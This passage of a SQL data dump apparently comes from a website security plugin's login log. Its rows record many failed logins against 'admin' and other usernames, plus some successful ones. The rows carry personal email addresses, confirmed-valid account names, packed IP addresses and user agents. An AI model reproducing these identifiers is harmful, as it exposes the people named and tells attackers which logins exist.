Safari/537.36'),(1361,5415,1695100798.946828,1,'loginFailInvalidUsername','khayrollima@yahoo.com',0,'\0\0\0\0\0\0\0\0\0\0/$D','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),(1362,5416,1695100802.395346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0~z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(1363,5417,1695100802.693083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0!˼','Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1364,5419,1695100809.703636,1,'loginFailInvalidUsername','testionos',0,'\0\0\0\0\0\0\0\0\0\0+Ʊ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(1365,5428,1695103873.764607,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K֣','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1366,5464,1695114303.765549,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1367,5465,1695114305.693765,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1368,5488,1695132717.864832,0,'loginOK','Bibbi',3,' ?S\\bxI`','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1369,5502,1695151648.883419,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0n\"','Mozilla/5.0 (Linux; Android 11; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(1370,5503,1695151940.673516,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.50'),(1371,5507,1695154761.482260,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Op','Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-T290) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Safari/537.36'),(1372,5510,1695159410.795168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1373,5515,1695164191.395543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0۰','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1374,5518,1695167940.329068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1375,5520,1695169315.844655,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1376,5530,1695183138.218539,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0BF','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(1377,5532,1695184569.719879,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0۰','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1378,5536,1695192154.072506,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1379,5538,1695193620.408058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0»','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1380,5542,1695197382.881806,1,'loginFailValidUsername','admin',1,'&\0\0\0\0\0\"','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(1381,5549,1695200539.494978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Fs','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1382,5604,1696333802.764205,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(1383,5625,1696347935.408878,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0/a','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(1384,5634,1696351582.898264,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1385,5637,1696352473.608771,0,'logout','admin',1,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1386,5638,1696352536.225305,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1387,5641,1696353321.299427,0,'loginOK','Bibbi',3,'\0\0\0\0\0\0\0\0\0\0Vbx','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1388,5656,1696359154.727810,1,'loginFailValidUsername','bibbi',3,'$\0a\0\0\0\0\0\0\n','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(1389,5673,1696365783.929618,1,'loginFailValidUsername','sara',2,'&\0`\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(1390,5681,1696368373.450108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1391,5703,1696377062.202325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D#|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1392,5727,1696383373.255057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1393,5775,1696403523.153750,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1394,5776,1696403525.668463,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1395,5780,1696404701.530491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1396,5783,1696406180.856166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0»[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1397,5793,1696409223.843169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0»[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1398,5794,1696409790.110921,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g[;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1399,5796,1696410109.227894,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1400,5825,1696423336.963868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1401,5827,1696424713.973592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1402,5828,1696424963.833436,1,'loginFailValidUsername','sara',2,'&\0\0\0\0\0 6n','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(1403,5843,1696432618.424926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1404,5846,1696433557.675818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0FL#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1405,5865,1696442821.771819,1,'loginFailInvalidUsername','df7c8c98dfd88d9dfad',0,'\0\0\0\0\0\0\0\0\0\0f','curl/7.30.0'),(1406,5888,1696461815.550952,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#:','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(1407,6151,1696656215.173184,1,'loginFailInvalidUsername','sara.chadwick@tummyrevolution.co.uk',0,'\0\0\0\0\0\0\0\0\0\0 p','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1408,6154,1696657671.621416,1,'loginFailInvalidUsername','sara.chadwick@tummyrevolution.co.uk',0,'\0\0\0\0\0\0\0\0\0\0 p','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1409,6155,1696657752.199906,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0 p','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1410,6194,1696704705.260157,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0°','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1411,6197,1696704857.558843,1,'loginFailValidUsername','admin',1,'*\0#\n:28R','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1412,6200,1696704880.205451,1,'loginFailInvalidUsername','tummyrevolution',0,' Hnur ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1413,6201,1696704888.267331,1,'loginFailValidUsername','admin',1,'(\0\Z-ݤ[wt','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1414,6202,1696704897.745891,1,'loginFailValidUsername','admin',1,'*/\0rȞ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1415,6206,1696705055.674042,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0&3x','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1416,6208,1696705117.206518,1,'loginFailInvalidUsername','tummyrevolution',0,'(*\0\0\nm%','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1417,6209,1696705122.219386,1,'loginFailInvalidUsername','tummyrevolution',0,'*Ղz\0\0{ n','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1418,6211,1696705154.894316,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B(','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1419,6213,1696705183.573114,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0[/k','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1420,6214,1696705195.273393,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1421,6214,1696705195.284028,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1422,6215,1696705259.184836,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1423,6216,1696705259.390204,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0zt','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1424,6217,1696705262.831125,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0;u|\0,V','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1425,6221,1696705289.823932,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\07','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1426,6228,1696705380.671927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0S','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1427,6230,1696705390.449915,1,'loginFailInvalidUsername','tummyrevolution',0,'*\0)o@,f@','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1428,6232,1696705433.059087,1,'loginFailInvalidUsername','tummyrevolution',0,'  dkdANѐ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1429,6233,1696705446.040965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ʎv)','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1430,6234,1696705471.203654,1,'loginFailInvalidUsername','tummyrevolution',0,'(Qhl0e','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1431,6234,1696705471.212299,1,'loginFailInvalidUsername','tummyrevolution',0,'(Qhl0e','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1432,6235,1696705478.932669,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0uC%','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1433,6237,1696705507.942799,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ĿQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1434,6238,1696705556.658354,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0٤ ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1435,6240,1696705580.790319,1,'loginFailValidUsername','admin',1,'(LPJeY>','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1436,6241,1696705595.221402,1,'loginFailInvalidUsername','tummyrevolution',0,' LN+/M&7<\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1437,6242,1696705597.088893,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0)Ȍ6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1438,6243,1696705606.662598,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1439,6246,1696705663.969899,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0YV','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1440,6247,1696705670.110569,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0]tS','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1441,6248,1696705683.064658,1,'loginFailInvalidUsername','tummyrevolution',0,'* |WA\0Mf','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1442,6249,1696705683.764126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ľV','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1443,6251,1696705699.098371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\Z.=','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1444,6253,1696705706.517181,1,'loginFailValidUsername','admin',1,'$I\0 8Y#\"T6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1445,6253,1696705706.524947,1,'loginFailValidUsername','admin',1,'$I\0 8Y#\"T6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1446,6255,1696705739.353134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0O','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1447,6259,1696705764.452484,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Wp','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1448,6263,1696705791.791282,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0%R','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1449,6264,1696705821.625078,1,'loginFailInvalidUsername','tummyrevolution',0,'(\08m$w','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1450,6268,1696705854.704294,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0˽','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1451,6269,1696705932.618076,1,'loginFailValidUsername','admin',1,'*A\0} ,Lf','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1452,6270,1696705938.838384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0)l?','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1453,6272,1696705944.585709,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0MI','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1454,6273,1696705945.950941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1455,6275,1696705954.204847,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0;u|\0,V','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1456,6279,1696705974.212426,1,'loginFailInvalidUsername','tummyrevolution',0,'()P%a\0y[','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1457,6281,1696705980.530855,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1458,6282,1696705986.434214,1,'loginFailInvalidUsername','tummyrevolution',0,'(e! \0P*A','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1459,6293,1696706072.362188,1,'loginFailInvalidUsername','tummyrevolution',0,'*/]\0A','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1460,6295,1696706079.202725,1,'loginFailInvalidUsername','tummyrevolution',0,'*7wy8\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1461,6296,1696706079.729402,1,'loginFailInvalidUsername','tummyrevolution',0,'*\'J:p#{','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1462,6300,1696706119.019616,1,'loginFailInvalidUsername','tummyrevolution',0,'*O 6\0AC','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1463,6302,1696706127.578994,1,'loginFailValidUsername','admin',1,'(LuG@P2:EI','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1464,6303,1696706141.124853,1,'loginFailInvalidUsername','tummyrevolution',0,'* |\n\n\0j`/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1465,6304,1696706150.902966,1,'loginFailValidUsername','admin',1,'*, Io &','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1466,6305,1696706156.728214,1,'loginFailInvalidUsername','tummyrevolution',0,'*\0pGL1','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1467,6307,1696706170.471854,1,'loginFailValidUsername','admin',1,'* |f\0Z`a) ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1468,6309,1696706179.667699,1,'loginFailInvalidUsername','tummyrevolution',0,'*?0\0})gۤ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1469,6310,1696706180.935248,1,'loginFailValidUsername','admin',1,'*P\0XRM','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1470,6311,1696706189.856494,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0?','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1471,6313,1696706203.186538,1,'loginFailValidUsername','admin',1,' \0b\0 ts','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1472,6315,1696706228.427926,1,'loginFailValidUsername','admin',1,'(\0 Z/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1473,6321,1696706264.146066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\02','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1474,6322,1696706274.120435,1,'loginFailValidUsername','admin',1,'&m\0鷬+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1475,6324,1696706280.808687,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0T-','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1476,6325,1696706284.199488,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0s`','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1477,6326,1696706303.039002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ק9','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1478,6327,1696706328.534211,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0MQee','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1479,6328,1696706330.596769,1,'loginFailValidUsername','admin',1,'$I\0k8im','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1480,6334,1696706413.885732,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\06','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1481,6336,1696706430.428445,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Q','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1482,6337,1696706443.728355,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1483,6340,1696706476.763988,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Õ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1484,6342,1696706482.645311,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\':','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1485,6343,1696706484.131922,1,'loginFailValidUsername','admin',1,'*, Il5b/QX','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1486,6346,1696706511.096137,1,'loginFailValidUsername','admin',1,'&Gqpœm|7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1487,6348,1696706524.137356,1,'loginFailInvalidUsername','tummyrevolution',0,'&0)\0qe 4K','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1488,6349,1696706527.012491,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0v','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1489,6351,1696706535.905320,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Zu','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1490,6356,1696706561.208648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-k','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1491,6357,1696706565.780332,1,'loginFailValidUsername','admin',1,'&\0@@h\0[_Jf','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1492,6358,1696706578.145077,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g\\j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like 